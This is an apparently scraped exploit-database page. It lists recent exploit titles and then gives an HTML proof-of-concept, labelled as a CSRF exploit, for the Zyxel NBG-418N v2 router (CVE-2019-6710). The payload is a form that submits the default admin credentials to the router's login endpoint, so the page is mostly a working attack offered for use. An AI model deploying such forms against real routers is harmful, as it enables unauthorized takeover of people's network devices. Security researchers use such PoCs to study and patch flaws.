
13 changes to exploits/shellcodes iOS 12.1.3 - 'cfprefsd' Memory Corruption Windows PowerShell ISE - Remote Code Execution NSClient++ 0.5.2.35 - Privilege Escalation Windows PowerShell ISE - Remote Code Execution LG Supersign EZ CMS - Remote Code Execution (Metasploit) Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter) ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution PHPads 2.0 - 'click.php3?bannerID' SQL Injection microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) Linux/x86 - shred file Shellcode (72 bytes)
22 lines
No EOL
698 B
HTML
22 lines
No EOL
698 B
HTML
<!--
|
|
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
|
|
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
|
|
# Tested on: Windows 10 x64
|
|
# CVE : CVE-2019-6710
|
|
# Author : Ali Can Gönüllü
|
|
# Twitter : @alicangonullu
|
|
|
|
Exploits :
|
|
-->
|
|
|
|
<html><head>
|
|
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
|
|
</head><body>
|
|
<form action="http://10.0.0.1/login.cgi" method="POST">
|
|
<input type="text" name="username" id="username" value="admin" /><br />
|
|
<input type="text" name="password" id="password" value="1234" /><br />
|
|
<input id="loginBtn" onclick="return onlogin()" type='submit'
|
|
value='Go!' />
|
|
<input type="hidden" name="submit.htm?login.htm" value="Send">
|
|
</form>
|
|
</body></html> |